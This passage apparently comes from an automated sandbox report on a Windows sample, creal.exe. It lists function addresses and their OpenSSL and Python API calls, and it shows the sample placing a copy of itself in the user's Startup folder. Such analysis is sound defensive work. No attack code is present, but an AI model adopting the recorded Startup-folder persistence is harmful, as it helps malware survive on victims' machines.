            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71F2360 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,2_2_00007FF8E71F2360
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E723C370 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,2_2_00007FF8E723C370
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1F41 CRYPTO_malloc,ERR_new,ERR_set_debug,2_2_00007FF8E71D1F41
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71EC3A0 CRYPTO_free,CRYPTO_memdup,2_2_00007FF8E71EC3A0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E72343A0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,2_2_00007FF8E72343A0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E724A3A0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,2_2_00007FF8E724A3A0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1F5A CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,2_2_00007FF8E71D1F5A
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D6233 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_set_data,BIO_clear_flags,2_2_00007FF8E71D6233
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D138E CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FF8E71D138E
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D23FB CRYPTO_free,CRYPTO_memdup,2_2_00007FF8E71D23FB
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71F6290 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,d2i_X509,X509_get0_pubkey,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FF8E71F6290
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71E62F0 CRYPTO_THREAD_run_once,2_2_00007FF8E71E62F0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1366 CRYPTO_malloc,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,ERR_pop_to_mark,CRYPTO_free,EVP_PKEY_free,2_2_00007FF8E71D1366
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D4130 CRYPTO_free,2_2_00007FF8E71D4130
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D2694 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,2_2_00007FF8E71D2694
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D13D9 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,2_2_00007FF8E71D13D9
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D150A OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_VERIFY_PARAM_get_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,2_2_00007FF8E71D150A
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1C58 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,2_2_00007FF8E71D1C58
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E721E160 CRYPTO_free,2_2_00007FF8E721E160
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7246190 CRYPTO_memcmp,2_2_00007FF8E7246190
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7236180 EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,2_2_00007FF8E7236180
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1CF3 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,2_2_00007FF8E71D1CF3
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E721E1D0 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FF8E721E1D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1186 EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,2_2_00007FF8E71D1186
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71ED040 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,2_2_00007FF8E71ED040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8406244 CRYPTO_memcmp,28_2_00007FF8F8406244
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84018E0 _Py_NoneStruct,_PyArg_UnpackKeywords,PyObject_GetBuffer,PyBuffer_IsContiguous,PyObject_GetBuffer,PyBuffer_IsContiguous,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,EVP_PBE_scrypt,PyBytes_FromStringAndSize,PyEval_SaveThread,EVP_PBE_scrypt,PyEval_RestoreThread,PyExc_ValueError,PyErr_SetString,PyBuffer_Release,PyBuffer_Release,PyLong_AsLong,PyErr_Occurred,PyLong_AsLong,PyErr_Occurred,PyExc_ValueError,PyExc_ValueError,PyErr_Format,_PyArg_BadArgument,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_OverflowError,PyExc_OverflowError,_Py_Dealloc,PyExc_ValueError,28_2_00007FF8F84018E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D8E50 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,28_2_00007FF8F84D8E50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84E1950 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,28_2_00007FF8F84E1950
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DD960 RAND_bytes_ex,CRYPTO_malloc,memset,28_2_00007FF8F84DD960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84FD9E0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,28_2_00007FF8F84FD9E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491023 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,28_2_00007FF8F8491023
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84911C2 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84911C2
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D99A0 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8F84D99A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849193D CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F849193D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84912D0 CRYPTO_THREAD_run_once,28_2_00007FF8F84912D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F3A90 ERR_new,ERR_set_debug,X509_get0_pubkey,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,EVP_PKEY_encrypt_init,RAND_bytes_ex,EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,28_2_00007FF8F84F3A90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A1AA0 CRYPTO_free,CRYPTO_strndup,28_2_00007FF8F84A1AA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84C3B10 CRYPTO_malloc,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,ERR_set_debug,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84C3B10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849FB00 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_derive_set_peer,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,28_2_00007FF8F849FB00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DFB00 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F84DFB00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491087 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,28_2_00007FF8F8491087
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D3C30 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84D3C30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84EFCC0 CRYPTO_free,CRYPTO_memdup,28_2_00007FF8F84EFCC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492536 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8492536
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A7CB0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,28_2_00007FF8F84A7CB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A9D50 CRYPTO_free,CRYPTO_strdup,28_2_00007FF8F84A9D50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849176C CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,28_2_00007FF8F849176C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84BDDC0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,28_2_00007FF8F84BDDC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849157D CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,28_2_00007FF8F849157D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84911E0 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,28_2_00007FF8F84911E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84B5DE0 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F84B5DE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849108C ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8F849108C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84E7DE0 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84E7DE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84925EF CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,28_2_00007FF8F84925EF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849FDB0 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,28_2_00007FF8F849FDB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8495E4A BIO_get_data,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,28_2_00007FF8F8495E4A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84919E7 CRYPTO_free,28_2_00007FF8F84919E7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8493EE0 CRYPTO_free,28_2_00007FF8F8493EE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F9E90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F84F9E90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491B31 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8491B31
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84EFF50 CRYPTO_free,CRYPTO_strndup,28_2_00007FF8F84EFF50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491ACD ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,28_2_00007FF8F8491ACD
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84925A4 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,28_2_00007FF8F84925A4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F3F10 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,28_2_00007FF8F84F3F10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A7F00 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,28_2_00007FF8F84A7F00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,28_2_00007FF8F8491B18
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A5FD0 OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,OPENSSL_sk_sort,28_2_00007FF8F84A5FD0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492400 CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,28_2_00007FF8F8492400
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84B5F90 CRYPTO_free,CRYPTO_free,28_2_00007FF8F84B5F90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849144C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,28_2_00007FF8F849144C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491D8E CRYPTO_free,CRYPTO_memdup,28_2_00007FF8F8491D8E
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849107D CRYPTO_free,28_2_00007FF8F849107D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A40F0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,28_2_00007FF8F84A40F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492734 CRYPTO_free,CRYPTO_strdup,28_2_00007FF8F8492734
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84B6080 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F84B6080
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A60B0 COMP_zlib,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,28_2_00007FF8F84A60B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84E80B0 CRYPTO_free,CRYPTO_free,28_2_00007FF8F84E80B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491113 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,28_2_00007FF8F8491113
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8503160 CRYPTO_free,CRYPTO_strndup,28_2_00007FF8F8503160
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84920EF CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F84920EF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84AF100 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,28_2_00007FF8F84AF100
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84FB100 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,28_2_00007FF8F84FB100
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849214E EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,28_2_00007FF8F849214E
